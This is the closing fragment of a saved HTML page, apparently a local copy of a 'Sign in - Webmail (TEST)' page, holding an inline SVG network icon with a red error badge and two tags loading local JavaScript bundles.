      <svg width="100px" height="100px" viewBox="0 0 16.003 16.003" xmlns="http://www.w3.org/2000/svg">
        <path color="#000000" d="M6.428 1c-.45.005-.778-.012-1.047.137a.676.676 0 0 0-.3.357c-.06.157-.08.343-.08.578V3.93c0 .235.021.42.08.576a.677.677 0 0 0 .3.357c.269.148.597.132 1.047.137H7v2H3.5c-.666 0-1.137.408-1.322.777C1.993 8.147 2 8.5 2 8.5V10h-.572c-.45.005-.778-.012-1.047.137a.676.676 0 0 0-.3.357c-.06.157-.08.343-.08.578v1.858c0 .235.021.42.08.576a.677.677 0 0 0 .3.357c.269.148.597.132 1.047.137h2.144c.45-.005.779.012 1.047-.137.135-.074.24-.2.3-.357.058-.157.08-.341.08-.576v-1.858c0-.235-.022-.421-.08-.578a.673.673 0 0 0-.3-.357c-.268-.15-.597-.132-1.046-.137H3V8.5s.01-.145.072-.275C3.137 8.094 3.166 8 3.5 8h9.41a1.548 1.548 0 0 0-.088-.223A1.485 1.485 0 0 0 11.5 7H8V5h.572c.45-.005.778.012 1.047-.137.134-.074.24-.2.299-.357.059-.157.08-.341.08-.576V2.072c0-.235-.021-.421-.08-.578a.673.673 0 0 0-.299-.357C9.35.987 9.022 1.005 8.572 1zm-.426 1h3v2h-3zm-5 9h3v2h-3z" fill="gray" font-family="sans-serif" font-weight="400" opacity=".5" overflow="visible" style="line-height:normal;font-variant-ligatures:normal;font-variant-position:normal;font-variant-caps:normal;font-variant-numeric:normal;font-variant-alternates:normal;font-feature-settings:normal;text-indent:0;text-align:start;text-decoration-line:none;text-decoration-style:solid;text-decoration-color:#000000;text-transform:none;text-orientation:mixed;shape-padding:0;isolation:auto;mix-blend-mode:normal;marker:none" white-space="normal"></path>
        <path class="error" color="#000000" d="M12.502 9a3.5 3.5 0 0 0-3.5 3.5 3.5 3.5 0 0 0 3.5 3.5 3.5 3.5 0 0 0 3.5-3.5 3.5 3.5 0 0 0-3.5-3.5zm-.5 1h1v1.168c0 .348-.016.667-.047.957-.03.29-.069.581-.115.875h-.666a12.898 12.898 0 0 1-.125-.875 9.146 9.146 0 0 1-.047-.957zm.5 4a.5.5 0 0 1 .5.5.5.5 0 0 1-.5.5.5.5 0 0 1-.5-.5.5.5 0 0 1 .5-.5z" fill="#f22c42" overflow="visible" style="marker:none"></path>
    </svg>
    <script src="./Sign in - Webmail (TEST)_files/vendor-b8dea93bd4cb874ed357.js.download" defer=""></script>
    <script src="./Sign in - Webmail (TEST)_files/app-91d3ab63d36f468b6c2a.js.download" defer=""></script>
</body>
</html>
